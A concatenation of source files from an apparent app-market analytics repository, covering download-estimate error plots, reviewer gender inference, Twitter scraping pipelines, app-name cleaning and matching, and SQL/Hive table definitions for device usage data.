out_dir = './data/filtered_%s'%top
if not os.path.exists(out_dir):
os.makedirs(out_dir)
df.to_csv('%s/%s'%(out_dir, out_file), index=False)
return df
def plot_df(df, out_file, what):
df = df[df['abs_rel_diff_monthly']<=1]
df = df[df['abs_rel_diff_weekly']<=1]
countries = df['store_id'].drop_duplicates()
dir = './data/plots'
for country in countries:
fdf = df[df['store_id']==country]
if 'ios' in out_file:
country = config.IOS_STORES_DICT[country]
elif 'android' in out_file:
country = config.ANDROID_STORES_DICT[country]
plt.clf()
ax = plt.subplot(111)
if what=='error':
p1, = plt.plot(fdf['abs_rel_diff_monthly'], fdf['abs_rel_diff_monthly'], 'r')
#p2, = plt.plot(fdf['abs_rel_diff_monthly'], fdf['abs_rel_diff_weekly'], 'b.', alpha=0.4)
p2 = plt.scatter(fdf['abs_rel_diff_monthly'], fdf['abs_rel_diff_weekly'], c=np.log(fdf['units_monthly']), s=30, cmap=mpl.cm.afmhot)
ax.legend([p1,p2], ['SBE Error', 'Web UI Error'])
out_path='%s/error_%s_%s.png'%(dir,country, out_file)
elif what =='estimate':
p1, = plt.plot(fdf['units_monthly'], fdf['units_monthly'], 'r')
p2, = plt.plot(fdf['units_monthly'], fdf['estimate_monthly'], 'b.', alpha=0.4)
p3, = plt.plot(fdf['units_monthly'], fdf['estimate_weekly'], 'g.', alpha=0.4)
ax.legend([p1,p2,p3], ['Actuals', 'SBE Estimate', 'Web UI Estimate'])
out_path='%s/estimates_%s_%s.png'%(dir,country, out_file)
plt.title('%s_%s'%(country, out_file))
#ax.set_xscale('log')
#ax.set_yscale('log')
plt.savefig(out_path)
#plt.show()
def main():
_check_args()
monthly_dir = sys.argv[1]
weekly_dir = sys.argv[2]
file_paths = {}
for file1 in os.listdir(monthly_dir):
if file1.endswith('.csv'):
for file2 in os.listdir(weekly_dir):
if file2.endswith('.csv'):
if file1.replace('Monthly', '')==file2.replace('Weekly',''):
#file_paths[file] = []
#file_paths[file].append(os.path.join(monthly_dir, file))
#file_paths[file].append(os.path.join(weekly_dir, file))
path1 = os.path.join(monthly_dir, file1)
path2 = os.path.join(weekly_dir, file2)
df = filter_by_monthly(path1, path2, file1, 200)
plot_df(df, file1, 'error')
plot_df(df, file1, 'estimate')
if __name__ == '__main__':
main()
<file_sep>/audience/legacy_experiments/populate_app_gender_db_ios.py
import nltk
import pandas as pd
import random
import re
import numpy as np
from unidecode import unidecode
import psycopg2
import numpy as np
import argparse
def define_gender(x):
is_male = 0.5
if x['reviewer_p_male'] < 0.0 or (x['reviewer_p_male'] < 0.9 and x['reviewer_p_male'] > 0.1):
if x['review_p_male'] < 0.0:
if x['title_p_male'] < 0.0:
is_male = 0.5
elif x['title_p_male'] < 0.5:
is_male = 0.0
elif x['title_p_male'] > 0.5:
is_male = 1.0
elif x['review_p_male'] < 0.5:
is_male = 0.0
elif x['review_p_male'] > 0.5:
is_male = 1.0
elif x['reviewer_p_male'] < 0.5:
is_male = 0.0
elif x['reviewer_p_male'] > 0.5:
is_male = 1.0
return is_male
def main():
parser = argparse.ArgumentParser(description='Fill demographics db for selected store_id, period and field')
parser.add_argument('-s','--store_id', help='Store ID', type=int, required=True)
parser.add_argument('-d','--start_date', help='start date', required=True)
parser.add_argument('-e','--end_date', help='end date', required=True)
parser.add_argument('-c','--connection', help='Connection string to pass to postgres', required=True)
args = vars(parser.parse_args())
store_id = args['store_id']
start_date = args['start_date']
end_date = args['end_date']
connection_string = args['connection']
conn1 = psycopg2.connect(connection_string)
cur1 = conn1.cursor()
conn2 = psycopg2.connect(connection_string)
cur2 = conn2.cursor()
sql1 = 'select distinct app_id from aa_review where store_id=%s and date>=%s and date<=%s limit 100'
params1 = (store_id, start_date, end_date)
print cur1.mogrify(sql1, params1)
cur1.execute(sql1, params1)
for row in cur1:
app_id = row[0]
sql2 = 'select r1.p_male_from_name as reviewer_p_male, r1.p_name_from_reviews\
from reviewer_p r1, aa_review r \
where r.reviewer=r1.reviewer \
and r.app_id=%s \
and r.store_id=%s \
and r.date>=%s \
and r.date<=%s'
params2 = (app_id, store_id, start_date, end_date)
#print cur1.mogrify(sql2, params2)
cur2.execute(sql2, params2)
df = []
for reviewer_p_male, review_p_male, title_p_male in cur2:
df.append({'reviewer_p_male': reviewer_p_male, 'review_p_male': review_p_male, 'title_p_male': title_p_male})
df = pd.DataFrame(df)
df['is_male'] = df.apply(define_gender, axis=1)
#sql2 = 'select name from aa_app where id=%s'
#params2 = (app_id, )
#cur2.execute(sql2, params2)
#app_name = cur2.fetchone()[0]
print df['is_male'].shape[0], df['is_male'].mean(), app_id
conn1.close()
conn2.close()
if __name__ == '__main__':
main()
<file_sep>/audience/twitter-scraping/lib/scraper/scraper/pipelines.py
# -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
import datetime
class ConvertData(object):
"""
Pipeline to convert data types of a item.
"""
def process_item(self, item, spider):
for field in ['n_tweets', 'n_lists', 'n_followers', 'n_following', 'n_favorites']:
if field in item and len(item[field]) > 0:
metric = item[field].split(' ')[0]
item[field] = int(metric.replace(',', ''))
if len(item['join_date']) > 0:
item['join_date'] = datetime.datetime.strptime(item['join_date'], "%H:%M %p - %d %b %Y")
return item<file_sep>/old_investigations/plot_improvement_daily_vs_games.R
#!/usr/bin/env Rscript
library(ggplot2)
library(scales)
source("internal/plot_common.R")
r <- read_csv_and_metainfo_from_arg()
df = r$df
metainfo = r$metainfo
# Select only when we have estimate from Games
sub_df = subset(df, !is.na(estimate_games))
# Remove outlier
sub_df <- subset(sub_df, abs(estimate_avg - units_avg) / units_avg < 100)
print("Shape beforing selecting.")
print(dim(df))
print("Shape after selecting.")
print(dim(sub_df))
df = sub_df
# Calculate relative eroror and improvement.
df$Games.Relative.Error <- abs(df$estimate_games- df$units_avg) / df$units_avg
df$SDA.Relative.Error <- abs(df$estimate_avg - df$units_avg) / df$units_avg
df$SDA.Improvement <- df$Games.Relative.Error - df$SDA.Relative.Error
f <- paste('plots/',
paste(metainfo$country, metainfo$period, 'improvement_daily_vs_games.png', sep='_'), sep='')
png(file=f, width=1300, height=1700)
plot_improvement(df, metainfo, "Games")
dev.off()
<file_sep>/aa_au_model/lib/get_device_types.py
import glob
import pandas as pd
import datetime
def get_device_info_from_ingest(startdate, enddate, bucketdir = '/s3mnt-projecta/aardvark-prod-ds-sample/VPN_DPI_INGEST/'):
"""
get device info per device per ingest file
:param startdate: startdate formatted like 'yyyymmdd'
:param enddate: enddate formatted like 'yyyymmdd'
:return: a DataFrame containing the imported data
"""
filedirs = map(lambda x:
bucketdir + pd.to_datetime(x).strftime('%Y-%m-%d') + '/',
pd.date_range(start=startdate,end=enddate))
column_names = ['timestamp','device_id','country','city','uri','user_agent','bundle_id','offset']
df = pd.DataFrame()
for filedir in filedirs:
filepaths = glob.glob(filedir + '/part*')
for filepath in filepaths:
if filepath.endswith('gz'):
compression='gzip'
else:
compression=None
data = pd.read_csv(filepath,
delimiter='\t',
header=-1,
compression=compression)
data.columns = column_names[0:len(data.columns)]
data_ua = data.groupby(['device_id','user_agent']).timestamp.count().reset_index()
data_ua['user_agent'] = data_ua.user_agent.apply(lambda x: str(x).lower())
data_ua['device'] = data_ua.user_agent.apply(lambda x: 'ipad' if 'ipad' in x else
'iphone' if 'iphone' in x else
'ipod' if 'ipod' in x else
'unknown')
data_ua = data_ua.groupby(['device_id','device']).timestamp.sum().reset_index()
data_ua['filepath'] = filepath
df = df.append(data_ua, ignore_index=True)
return df
def get_device_type_per_device(device_info):
"""
get device type per device
device_info: required input data frame as generated by get_device_info_from_ingest()
:return: a DataFrame containing the imported data
"""
df = device_info.groupby(['device_id','device']).timestamp.sum().reset_index()
device_types = pd.DataFrame()
for device_id in df.device_id.drop_duplicates():
index_row = df[df.device_id == device_id]['timestamp'].argmax()
device_type = pd.DataFrame(df.ix[index_row][['device_id','device']]).T
device_types = device_types.append(device_type, ignore_index=True)
return device_types
<file_sep>/exact-matching-improvement/icon_lib/data_generation.py
"""
Module for data generation. Does most computation, except for scraping and metric computation. Main functions:
- get_matches: get all matches from the database
- get_non_matches: generate (a sample of) non-matches
- get_app_info: get app details for all matched apps
- get_app_icon_metric: load icon metric (e.g. hashes) for matched apps from disk or recompute them
- combine_icon_metrics_with_pairs: combine pairs of apps (matches or non-matches) with their icon metrics
"""
__author__ = 'hgriffioen'
import numpy as np
import pandas as pd
import preprocessing
import random
import warnings
from config import (DEFAULT_HASH_TYPE, DEFAULT_HASH_SIZE, DEFAULT_HASHING_POOL_SIZE)
def get_matches(dbi, from_market, to_market, n_sample=None):
"""
Get matches between two markets.
:param dbi: Database interface object
:param from_market: ID of market to generate non-matches from
:param to_market: ID of market to generate matches to
:param n_sample: Number of samples to return (default is all)
:return: DataFrame with matches
Note: combines matches from both directions.
"""
all_matches = get_all_matches(dbi, do_force_symmetric_matches=True)
matches = all_matches[(all_matches.from_market == from_market) &
(all_matches.to_market == to_market)]
if n_sample is not None:
matches = sample_rows(matches, n_sample)
return matches
def get_all_matches(dbi, do_force_symmetric_matches=True):
"""
Get matches for all markets.
:param dbi: Database interface object
:param do_force_symmetric_matches: Make sure that are matches are present in both directions if True
:return: DataFrame with matches
"""
matches = dbi.query_all_matches()
if do_force_symmetric_matches:
matches = generate_symmetric_matches(matches)
return matches
def generate_symmetric_matches(matches):
"""
Duplicate matches so that they are present in both directions.
:param matches: DataFrame with matches
:return: DataFrames with matches for both directions
"""
symmetric_matches = pd.concat([matches,
matches.rename(columns={'from_market': 'to_market',
'from_app_id': 'to_app_id',
'to_market': 'from_market',
'to_app_id': 'from_app_id'},
copy=True)],
axis=0, ignore_index=True)
return symmetric_matches.drop_duplicates(subset=['from_market', 'to_market',
'from_app_id', 'to_app_id'])
def sample_rows(df, n_sample):
"""
Return a random sample of rows (index will be reset).
:param def: DataFrame
:param n_sample: Number of rows to sample
:return: DataFrame with samples
"""
return df.ix[random.sample(df.index, n_sample)].reset_index(drop=True)
def get_non_matches(matches, matched_apps, from_market, to_market, n_sample=None, method='brute_force'):
"""
Get non-match combinations between matched apps between two markets.
:param matches: DataFrame with matches
:param matched_apps: DataFrame with matched apps
:param from_market: ID of market to generate non-matches from
:param to_market: ID of market to generate non-matches to
:param n_sample: Number of samples to return (default is all)
:param method: String with approach to sample with ('brute_force' or 'iterative')
:return: DataFrame with non-matches
"""
from_apps = matched_apps[matched_apps.market == from_market].copy()
to_apps = matched_apps[matched_apps.market == to_market].copy()
known_matches = matches[(matches.from_market == from_market) &
(matches.to_market == to_market)]
if method == 'brute_force':
non_matches = brute_force_sample_non_matches(from_apps, to_apps, known_matches, n_sample)
elif method == 'iterative':
non_matches = iteratively_sample_non_matches(from_apps, to_apps, known_matches, n_sample)
else:
raise Exception("Unknown method: " + method)
return non_matches
def brute_force_sample_non_matches(from_apps, to_apps, known_matches, n_sample=None):
"""
Brute force sample from all possible combinations between elements in from_apps and to_apps.
:param from_apps: DataFrame with apps to match from
:param to_apps: DataFrame with apps to match to
:param known_matches: Combinations that are known to be matches
:param n_sample: Number of samples to draw (default is # of possible combinations)
:return: DataFrame with n_sample non-matches
"""
try:
all_combinations = get_all_combinations(from_apps, to_apps)
non_matches = remove_known_matches(all_combinations, known_matches)
if n_sample is not None:
non_matches = sample_rows(non_matches, n_sample)
except MemoryError:
if n_sample is None:
raise MemoryError("Too many matched apps to generate non-matches for, specify n_sample.")
warnings.warn('Brute force sampling failed, using iterative sampling.')
non_matches = iteratively_sample_non_matches(from_apps, to_apps, known_matches, n_sample)
return non_matches
def iteratively_sample_non_matches(from_apps, to_apps, known_matches, n_sample):
"""
Iteratively sample from all possible combinations between elements in from_apps and to_apps. Should be used when
brute_force_sample_non_matches fails due to memory errors.
:param from_apps: DataFrame with apps to match from
:param to_apps: DataFrame with apps to match to
:param known_matches: Combinations that are known to be matches
:param n_sample: Number of samples to draw
:return: DataFrame with n_sample non-matches
"""
assert n_sample is not None, "n_sample cannot be None if sampling iteratively"
SAMPLE_FACTOR = 1.2 # Factor to multiple the number of to be generated samples with to compensate for duplicates
non_matches = draw_unique_combinations(from_apps, to_apps, round(n_sample * SAMPLE_FACTOR))
non_matches = non_matches.iloc[:n_sample]
n_remaining = n_sample - len(non_matches)
while n_remaining > 0:
potential_new_non_matches = draw_unique_combinations(from_apps, to_apps, round(n_remaining * SAMPLE_FACTOR))
new_non_matches = remove_known_matches(potential_new_non_matches, known_matches)
non_matches = non_matches.append(new_non_matches, ignore_index=True)
non_matches.drop_duplicates(['from_market', 'from_app_id', 'to_market', 'to_app_id'], inplace=True)
non_matches = non_matches.iloc[:n_sample]
n_remaining = n_sample - len(non_matches)
return non_matches.reset_index(drop=True)
def get_all_combinations(from_apps, to_apps):
"""
Get all combinations between elements in from_apps and to_apps.
:param from_apps: DataFrame with apps to match from
:param to_apps: DataFrame with apps to match to
:return: DataFrame with all combinations
"""
from_apps['dummy'] = 1
to_apps['dummy'] = 1
all_combinations = pd.merge(from_apps, to_apps, on='dummy', suffixes=['_from', '_to'])
all_combinations = fix_app_id_and_market_column_names(all_combinations)
return all_combinations
def remove_known_matches(all_combinations, known_matches):
"""
Remove matches that are already known.
:param all_combinations: DataFrame with potential matches
:param known_matches: DataFrame with known matches
:return: DataFrame consisting of all combinations in all_combinations that are not in known_matches
"""
MATCH_COLUMNS = ['from_market', 'from_app_id', 'to_market', 'to_app_id']
all_combinations['dummy'] = 1
known_matches['dummy'] = 1
temp = pd.merge(all_combinations, known_matches[MATCH_COLUMNS + ['dummy']],
on=MATCH_COLUMNS,
how='outer', suffixes=['_x', '_known'])
unknown_matches = temp[temp.dummy_known.isnull()].reset_index(drop=True)
unknown_matches.drop(['dummy_x', 'dummy_known'], axis=1, inplace=True)
return unknown_matches
def fix_app_id_and_market_column_names(df):
"""
Switch suffixes to prefixes in app_id_*- and market_*-columns.
:param df: DataFrame with columns app_id_from, app_id_to, market_from, market_to
:return: Fixed DataFrame
"""
fixed_df = df.rename(columns={'app_id_from': 'from_app_id', 'app_id_to': 'to_app_id',
'market_from': 'from_market', 'market_to': 'to_market'})
return fixed_df
def draw_unique_combinations(from_apps, to_apps, n_sample):
"""
Draw a sample of unique combinations
:param from_apps: DataFrame with apps to match from
:param to_apps: DataFrame with apps to match to
:param n_sample: Number of samples to draw
:return: DataFrame with a at most n_sample combinations
"""
from_sample = random_choice_df(from_apps, n_sample)
to_sample = random_choice_df(to_apps, n_sample)
new_non_matches_sample = pd.merge(from_sample, to_sample, left_index=True, right_index=True,
suffixes=['_from', '_to'])
new_non_matches_sample = fix_app_id_and_market_column_names(new_non_matches_sample)
return new_non_matches_sample.drop_duplicates(['from_market', 'from_app_id', 'to_market', 'to_app_id'])
def random_choice_df(df, n_sample):
"""
Randomly choose rows out of a DataFrame with replacement.
:param df: DataFrame to sample from
:param n_sample: Number of samples to draw
:return: Sampled DataFrame
"""
return df.ix[np.random.choice(df.index, n_sample)].reset_index(drop=True)
def compute_app_icon_metrics(dbi, hash_type=DEFAULT_HASH_TYPE, hash_size=DEFAULT_HASH_SIZE,
workers=DEFAULT_HASHING_POOL_SIZE, save_path=None):
"""
Compute icon metrics for matched apps.
:param dbi: Database interface object
:param save_path: Path to save data to
:param hash_type: Hash type to use (if generating new metrics)
:param hash_size: Hash size to use (if generating new metrics)
:param workers: Number of workers to hash with
:return: DataFrame with app icon metrics
"""
matched_apps = dbi.query_matched_apps()
app_metrics = preprocessing.preprocess_icons_from_disk(matched_apps, hash_type, hash_size, workers)
if save_path:
app_metrics.to_csv(save_path)
return app_metrics
def load_app_icon_metrics(data_path):
"""
Load saved icon metrics for matched apps. Assumes data is generated using compute_app_icon_metrics.
:param data_path: Path to load data from
:return: DataFrame with app icon metrics
"""
return pd.DataFrame.from_csv(data_path)
def combine_icon_metrics_with_pairs(pairs, app_metrics):
"""
Combine icon metrics with (non-)match pairs.
:param pairs: Pairs of apps
:param app_metrics: App icon metrics
:return: DataFrame with icon metrics for pairs of apps
"""
merged_df = pd.merge(pd.merge(pairs, app_metrics,
left_on=['from_market', 'from_app_id'],
right_on=['market', 'app_id']),
app_metrics, left_on=['to_market', 'to_app_id'],
right_on=['market', 'app_id'], suffixes=['_from', '_to'])
merged_df.drop(['market_from', 'app_id_from', 'market_to', 'app_id_to'],
axis=1, inplace=True)
return merged_df
def combine_matches_and_non_matches(matches, non_matches):
"""
Combine matches and non-matches in one DataFrame with label 1 and 0.
:param matches: DataFrame with matches
:param non_matches: DataFrame with non-matches
:return: Concatenated DataFrame with labels
"""
matches['label'] = 1
non_matches['label'] = 0
return pd.concat([matches, non_matches])<file_sep>/exact-matching-improvement/lib/features_aa_improved.py
#!/usr/bin/python
# -*- coding: utf-8 -*-
__author__ = 'jjanssen'
import temp_database
import re
import config as cf
punctuation_blacklist = ['’', '\'', '[', ']', '(', ')', '{', '}', '⟨', '⟩', ':', ',', '،', '、', '―', '…',
'.', '!', '.', '‐', '-', '?', '‘', '’', '“', '”', '\'', '"', '"', ';', '/', '⁄', '!']
typograpic_blacklist = ['&', '*', '@', '\\', '•', '^', '†', '‡', '°', '″', '¡', '¿', '№', '\÷', 'º', 'ª',
'%', '‰', '+', '−', '‱', '¶', '′', '″', '‴', '§', '~', '_', '|', '‖', '¦', '–', '-',
'#', '$', '–',]
phrase_filter_list = ['for iphone','for ipad', 'ipod touch', 'for android', 'for pad', 'for kindle', 'for kids', 'for private groups', 'for_kids', 'for_private groups', 'Free\\+', '\\+\\+',
'Full free', 'Official App', 'for kakao', 'Abby Monkey', 'Free Music Downloader', 'tinder box',
'Splash Math', 'Vocabulary Trainer']
word_filter_list = ['iPhone', 'Android', 'iPad', 'Pad', 'ipod','free', 'Ad', 'Ads', 'Ad-free', 'ads-free', 'HD',
'FreePlay', 'premium' 'PLUS', 'Plus\\+', 'Deluxe', 'Pro', 'Professional', 'Platinum', 'Lite', 'version',
'edition', 'Human', 'Revista', 'Appstar', 'Metronome', 'graalonline', 'AR', 'RPG', 'MMORPG', 'XL',
'Elite', 'BAND', 'mobile', 'digital', 'epaper', 'e-paper', 'replica', 'magazine', 'per', 'online']
mark_filter_list = [':', '-']
app_name_filter_list = [' iPhone',' Android',' iPad',' Pad','ipod','ipod touch',' free','Ad','Ads',
'Ad-free','ads-free','HD','FreePlay','premium','PLUS','Plus\\+','Deluxe','Pro',
'Professional','Platinum','Lite','version','edition','for kids',
'for private groups','for_kids','for_private groups','Free\\+','\\+\\+','AR',
'Full free','RPG','MMORPG','XL','Elite','BAND','Official App','mobile','digital',
'epaper','e-paper','replica','magazine','per','online','for kakao','graalonline',
'Abby Monkey','Free Music Downloader','Metronome','tinder box','Appstar',
'Splash Math','Vocabulary Trainer','Human','Revista']
prefix_words = ['a', 'an', 'the', 'de', 'il', 'le', 'les']
app_name_filter_list = [x.lower() for x in app_name_filter_list]
app_name_filter_list = [x.replace(' ', '') for x in app_name_filter_list]
app_name_filter_list = [x.decode('utf-8') for x in app_name_filter_list]
prefix_words = [x.lower() for x in prefix_words]
prefix_words = [x.replace(' ', '') for x in prefix_words]
prefix_words = [x.decode('utf-8')for x in prefix_words]
phrase_filter_list = [x.lower() for x in phrase_filter_list]
word_filter_list = [x.lower() for x in word_filter_list]
word_list = []
word_list.extend(app_name_filter_list)
word_list.extend(prefix_words)
atomic_list = []
atomic_list.extend(punctuation_blacklist)
atomic_list.extend(typograpic_blacklist)
app_clean_ip = re.compile(r'[\xc2\xa9|\xe2\x84\xa2|\xc2\xae]+')
# basic methods
## find and remove substring after certain marks
def find_mark(input_string):
result = False
for m in mark_filter_list:
if m in input_string:
result = True
return result
def remove_after_mark(input_string):
input_string.lower()
if find_mark(input_string):
for m in mark_filter_list:
input_string = input_string.split(m)[0]
return input_string
def clean_ip(input_string):
return app_clean_ip.sub(u"", input_string)
## clean phrases
def clean_phrase(input_string):
input_string.lower()
for p in phrase_filter_list:
input_string = input_string.replace(p, "")
return input_string
## clean words
def clean_word(input_string):
result = []
split_list = input_string.split()
for s in split_list:
add = True
for a in app_name_filter_list:
if a == s:
add = False
if add:
result.append(s)
return " ".join(result)
def clean_word_unicode(input_string):
result = []
split_list = input_string.split()
for s in split_list:
add = True
for a in word_filter_list:
if a == s:
add = False
if add:
result.append(s)
return " ".join(result)
## clean characters bases on list
def clean_atomic(input_string):
result = []
string_list = list(input_string)
for s in string_list:
add = True
for c in atomic_list:
if c == s:
add = False
if add:
result.extend(s)
return "".join(result)
## clean based on unicode categories
def remove_per_unicode_category(text):
lower_text = text.lower()
return lower_text.translate(cf.removal_translate_table)
def clean_punctuation(text):
result = []
if text is not None:
text_to_list = text.lower().split()
for text_element in text_to_list:
text_element = text_element.decode('utf-8')
result.append(text_element.translate(cf.removal_translate_table))
text = " ".join(result)
return text
def clean_app_name(input_string):
lower_string = input_string.lower()
cleaned_atomic = clean_atomic(lower_string)
cleaned_word = clean_word(cleaned_atomic)
return cleaned_word
def clean_app_name_v2(input_string):
cleaned_atomic = clean_punctuation(input_string)
cleaned_word = clean_word(cleaned_atomic)
return cleaned_word
# method that call basic methods to result in a coherant approach
## clean improvement 1
def clean_appname_row(row):
row['aa_improved'] = clean_app_name(row['app_name'])
return row
## clean improvement 1b
def clean_appname_row_v2(row):
row['aa_improved_v2'] = clean_app_name_v2(row['app_name'])
return row
## clean improvement 2
def clean_per_unicode_category(row):
cleaned_mark = remove_after_mark(row['app_name'].lower())
cleaned_phrase = clean_phrase(cleaned_mark)
cleaned_word = clean_word_unicode(cleaned_phrase)
row['aa_improved_unicode'] = remove_per_unicode_category(cleaned_word.decode('utf-8'))
return row
<file_sep>/int-vs-m-benchmark/create_table_statements.sql
/*
Create table statements for generic tables:
- downloads
- sales
- rank_data
- customize_rank_data
- daily_ranks
- curve
- curve_ref
- est_weight
- sbe_est_app_daily
*/
-- Select schema to use.
use aa_benchmarking_ios;
-- use aa_benchmarking_android;
/*
Input table: downloads and sales.
*/
DROP TABLE IF EXISTS downloads;
DROP TABLE IF EXISTS sales;
DROP TABLE IF EXISTS rank_data;
DROP TABLE IF EXISTS customize_rank_data;
DROP TABLE IF EXISTS daily_ranks;
DROP TABLE IF EXISTS curve;
DROP TABLE IF EXISTS curve_ref;
DROP TABLE IF EXISTS est_weight;
DROP TABLE IF EXISTS sbe_est_app_daily;
CREATE TABLE downloads (
app_id integer NOT NULL,
date date NOT NULL,
store_id integer NOT NULL,
feed INT NOT NULL,
units integer NOT NULL,
CONSTRAINT PRIMARY KEY (
date,
app_id,
store_id,
feed),
INDEX downloads_pk (
app_id,
date,
store_id),
INDEX downloads_store_id_app_id_date_index (
store_id,
app_id,
date),
INDEX downloads_date_store_id_index (
date,
store_id)
);
CREATE TABLE sales (
app_id integer NOT NULL,
date date NOT NULL,
store_id integer NOT NULL,
feed INT NOT NULL,
revenue real NOT NULL,
CONSTRAINT PRIMARY KEY (
date,
app_id,
store_id,
feed),
INDEX application_date_idx (
app_id,
date),
INDEX sales_date_store_id_index (
date,
store_id)
);
CREATE TABLE rank_data (
store_id integer NOT NULL,
category_id smallint NOT NULL,
feed smallint NOT NULL,
start_date date NOT NULL,
end_date date NOT NULL,
data TEXT NOT NULL,
CONSTRAINT PRIMARY KEY (
start_date,
end_date,
store_id,
category_id,
feed)
);
CREATE TABLE customize_rank_data (
store_id integer NOT NULL,
category_id smallint NOT NULL,
feed smallint NOT NULL,
start_date date NOT NULL,
end_date date NOT NULL,
data TEXT NOT NULL,
CONSTRAINT PRIMARY KEY (
start_date,
end_date,
store_id,
category_id,
feed)
);
CREATE TABLE daily_ranks (
store_id INT NOT NULL,
category_id INT NOT NULL,
feed INT NOT NULL,
date DATE NOT NULL,
data LONGTEXT,
CONSTRAINT PRIMARY KEY (
store_id,
category_id,
feed,
date),
INDEX date_store_id(
date,
store_id,
category_id,
feed)
);
/*
Output tables.
*/
CREATE TABLE curve (
store_id integer NOT NULL,
category_id smallint NOT NULL,
feed smallint NOT NULL,
start_date date NOT NULL,
end_date date NOT NULL,
data TEXT NOT NULL,
CONSTRAINT PRIMARY KEY (
start_date,
end_date,
store_id,
category_id,
feed)
);
CREATE TABLE curve_ref (
store_id integer NOT NULL,
category_id smallint NOT NULL,
feed smallint NOT NULL,
start_date date NOT NULL,
end_date date NOT NULL,
data TEXT NOT NULL,
CONSTRAINT PRIMARY KEY (
store_id,
category_id,
feed,
start_date),
INDEX curve_ref_index (
start_date,
end_date,
store_id,
category_id,
feed)
);
/*
Estimation tables.
*/
CREATE TABLE est_weight (
date date not NULL,
store_id integer NOT NULL,
unit_type smallint NOT NULL,
weight real NOT NULL,
CONSTRAINT PRIMARY KEY (
date,
store_id,
unit_type)
);
CREATE TABLE sbe_est_app_daily (
date date NOT NULL,
store_id integer NOT NULL,
feed INT NOT NULL,
app_id integer NOT NULL,
category_id smallint NOT NULL,
estimate integer NOT NULL,
rank smallint NOT NULL,
CONSTRAINT PRIMARY KEY (
date,
store_id,
feed,
app_id,
category_id
)
);
<file_sep>/aa_au_model/mdm/sql/emr_mdm_usage.sql
-- See table definitions in aa-data-science/aa_au_model/hive_ql/HiveQL table from S3.
-- iOS uses mdm_fact_app_days_running, Android uses mdm_fact_app_screen_time
-- http://blog.cloudera.com/blog/2014/08/improving-query-performance-using-partitioning-in-apache-hive/
-- In non-strict mode, all partitions are allowed to be dynamic, and please use partition column to limit the data range.
-- Here for most of default tables, the partition column is datestr
set hive.exec.dynamic.partition.mode = nonstrict;
drop table if exists devices_ios;
create table devices_ios
as
select
s.date as period_date,
s.guid_key,
g.guid,
g.device_platform,
o.iso_country_code,
d.device_type
from
mdm_sample_selected_device_weekly s
join mdm_dim_operator o
on s.operator_key = o.operator_key
join mdm_dim_device d
on s.device_key = d.device_key
join mdm_dim_guid g
on s.guid_key = g.guid_key
where
o.iso_country_code in ('us', 'gb', 'jp' ,'kr')
and s.datestr between '2015-09-13' and '2015-10-31'
and d.device_type != 'unknown'
and g.device_platform = 'ios'
;
drop table if exists mdm_usage_ios_all;
create table mdm_usage_ios_all (
date date,
device_id string,
bundle_id string,
iso_country_code string,
device_type string
)
row format delimited fields terminated by '\t'
lines terminated by '\n'
stored as textfile
location 's3://aardvark-prod-pdx-ds-workspace/mdm/usage_ios_all'
;
insert overwrite table mdm_usage_ios_all
select
/*+ STREAMTABLE(usage) */
usage.date as date,
guid_hash.hashed_guid as device_id,
usage.bundle_id as bundle_id,
usage.iso_country_code as iso_country_code,
usage.device_type as device_type
from (
select
/*+ STREAMTABLE(devices_ios) */
devices_ios.period_date as date,
devices_ios.guid_key as guid_key,
max(devices_ios.guid) as guid,
m.bundle_id as bundle_id,
max(devices_ios.device_platform) as device_platform,
max(devices_ios.iso_country_code) as iso_country_code,
max(devices_ios.device_type) as device_type
from devices_ios
join mdm_sample_app_days_running m
on m.datestr between '2015-09-13' and '2015-10-31'
and m.bundle_id not rlike '^(com.mobidia.My-Data-Mgr|com.mobidia.android.mdm|com.vpndefender|com.smartsense.vpndefender).*'
-- Join daily usage with proper end date by adding the number of
-- days to the next Saturday to the daily date
-- As the Saturday is the 6th day, shift all days with 1 day to
-- easily compute the distance
and devices_ios.period_date = date_add(m.date,
cast(7 -
from_unixtime(unix_timestamp(date_add(m.date, 1), 'yy-MM-dd'), 'u')
as int
)
)
and devices_ios.guid_key = m.guid_key
group by
devices_ios.period_date,
devices_ios.guid_key,
m.bundle_id
) usage
join mdm_sample_guid_hash guid_hash
on guid_hash.guid = usage.guid and guid_hash.platform = usage.device_platform
;
drop table if exists devices_ios;
drop table if exists devices_android;
create table devices_android
as
select
s.date as period_date,
s.guid_key,
g.guid,
g.device_platform,
o.iso_country_code,
d.device_type
from
mdm_sample_selected_device_weekly s
join mdm_dim_operator o
on s.operator_key = o.operator_key
join mdm_dim_device d
on s.device_key = d.device_key
join mdm_dim_guid g
on s.guid_key = g.guid_key
where
o.iso_country_code in ('us', 'gb', 'jp' ,'kr')
and s.datestr between '2015-09-13' and '2015-10-31'
and d.device_type != 'unknown'
and g.device_platform = 'android'
;
drop table if exists mdm_usage_android_all;
create table mdm_usage_android_all (
date date,
device_id string,
bundle_id string,
iso_country_code string,
device_type string
)
row format delimited fields terminated by '\t'
lines terminated by '\n'
stored as textfile
location 's3://aardvark-prod-pdx-ds-workspace/mdm/usage_android_all'
;
insert overwrite table mdm_usage_android_all
select
/*+ STREAMTABLE(usage) */
usage.date as date,
guid_hash.hashed_guid as device_id,
usage.bundle_id as bundle_id,
usage.iso_country_code as iso_country_code,
usage.device_type as device_type
from (
select
/*+ STREAMTABLE(devices_android) */
devices_android.period_date as date,
devices_android.guid_key as guid_key,
max(devices_android.guid) as guid,
m.bundle_id as bundle_id,
max(devices_android.device_platform) as device_platform,
max(devices_android.iso_country_code) as iso_country_code,
max(devices_android.device_type) as device_type
from devices_android
join mdm_sample_app_screen_time m
on m.datestr between '2015-09-13' and '2015-10-31'
and m.bundle_id not rlike '^(com.mobidia.My-Data-Mgr|com.mobidia.android.mdm|com.vpndefender|com.smartsense.vpndefender).*'
-- Join daily usage with proper end date by adding the number of
-- days to the next Saturday to the daily date
-- As the Saturday is the 6th day, shift all days with 1 day to
-- easily compute the distance
and devices_android.period_date = date_add(m.date,
cast(7 -
from_unixtime(unix_timestamp(date_add(m.date, 1), 'yy-MM-dd'), 'u')
as int
)
)
and devices_android.guid_key = m.guid_key
group by
devices_android.period_date,
devices_android.guid_key,
m.bundle_id
) usage
join mdm_sample_guid_hash guid_hash
on guid_hash.guid = usage.guid and guid_hash.platform = usage.device_platform
;
drop table if exists devices_android;
<file_sep>/old_investigations/app_statistics.py
'''
Created on Feb 20, 2013
@author: perezrafael
'''
import pandas as pd
import os, os.path
